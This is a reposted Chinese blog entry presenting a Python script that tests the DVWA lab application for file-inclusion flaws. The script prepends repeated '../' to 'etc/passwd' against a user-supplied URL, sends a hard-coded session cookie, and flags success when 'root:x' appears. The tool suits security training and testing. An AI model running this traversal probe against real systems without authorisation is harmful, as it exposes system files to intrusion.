其他分享
首页 > 其他分享> > 文件包含漏洞自动化测试代码

文件包含漏洞自动化测试代码

作者:互联网

import requests
import sys
import termcolor
"""
以DVWA Web应用为目标进行测试,选择其含有文件包含漏洞的页面
Target URL:  http://192.168.140.137/dvwa/vulnerabilities/fi/?page=
"""
def banner():
    banner = """
            ******************************************************************
            ******************************************************************
                            File Inclusion Test Tool by Jason Wong V1.0
            ******************************************************************
            ******************************************************************
            Warning:Your target URL should be like http://example.com/index.php?file=

        """
    print(banner)

def main():
    banner()
    target_url = input("Enter target url to test: ")
    payloads = 'etc/passwd'
    cookies = {
    "PHPSESSID": "da096185e02e1ee5b6edf69fdc83c855",
    "security": "low"
    }
    detect_flag = False
    print('\nTest results: \n\n')
    try:
        for i in range(1,10):
            url = target_url + "../"*i + payloads 
            # print(url)
            response = requests.get(url=url, cookies=cookies).text
            # print(response)
            if 'root:x' in response:
                print(url,'\n')
                print(termcolor.colored("\tFile Including Vulnerability Found!", 'blue'))
                detect_flag = True
                break
    except KeyboardInterrupt:
        print("Exit the program")
        sys.exit()

    if detect_flag == False:
        print("No File Inclusion Vulnerability Found!")

if __name__ == "__main__":
    main()

 

标签:__,target,url,print,漏洞,自动化,测试代码,main,banner
来源: https://www.cnblogs.com/jason-huawen/p/16219390.html